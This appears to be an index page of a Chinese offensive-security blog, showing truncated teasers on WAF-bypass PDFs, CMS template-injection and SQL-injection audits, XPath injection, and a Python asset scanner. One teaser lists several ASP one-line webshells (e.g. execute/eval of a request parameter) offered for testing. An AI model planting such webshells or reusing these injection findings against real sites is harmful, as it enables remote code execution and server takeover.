内容这里就不做介绍了
自行看pdf吧。
地址:
wafbypass_misc.pdf
wafbypass_upload.pdf
wafbypass_sql.pdf
转自:从容阅读全文>>
cms版本:6.45
直接上代码
function parseIf($content){
if (strpos($content,'{if:')=== false){
return $content;
}else{
$labelRule = buildregx("{if:(.*?)}(.*?){end if}","is");
$labelRule2="{elseif";
...阅读全文>>
0x01 简介
XPath注入攻击是指利用XPath 解析器的松散输入和容错特性,能够在 URL、表单或其它信息上附带恶意的XPath 查询代码,以获得权限信息的访问权并更改这些信息。XPath注入发生在当站点使用用户输入的信息来构造请求以获取XML数据。攻击者对站点发送经过特殊构造的信息来探究站点使用的XML是如何构造的,从而进一步获取正常途径下无法获取的数据。当XML数据被用作账户验证时,攻击者还可以提升他的权限。
0x02 原理
XPath 注入的原理与sql注入大体类似。主要是通过构建特殊的输入,这些输入往往是XPath语法中的一些组合,这些输入将作...阅读全文>>
只是收集,并没有逐个测试可用性,请自行测试,谢谢:)!
asp一句话
<%execute(request("webbaozi"))%>
<%eval request("webbaozi")%>
<%eval(Request.Item["webbaozi"],"unsafe");%>
<SCRIPT language=VBScript runat="server">execute request("webbaozi")</SCRIPT>
<%
Function...阅读全文>>
今天没事看了下
https://www.seebug.org/vuldb/ssvid-92628
https://www.seebug.org/vuldb/ssvid-92658
没有放出poc,自己动手。
第一个登录注入复现成功,但是第二个,始终绕不过。
登录地址:zzcms.com/user/login.php
登录成功会记录最后登录的ip地址
跟进获取ip函数
文件:inc/fuction.php
function getip(){
if (getenv...阅读全文>>
网络资产信息扫描:
在渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口,端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:
1、轻巧简洁,只需python环境,无需安装额外外库。
2、扫描完成后生成独立页面报告。
此脚本的大概流程为 IC...阅读全文>>
在tpl.php中
/*---------------------------
function savetagfile() { }
保存标签碎片修改
--------------------------*/
else if($action=='savetagfile')
{
if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))
{
ShowMsg('文件名不合法,不允许进行操作!', '-1');
exit();
}
require_on...阅读全文>>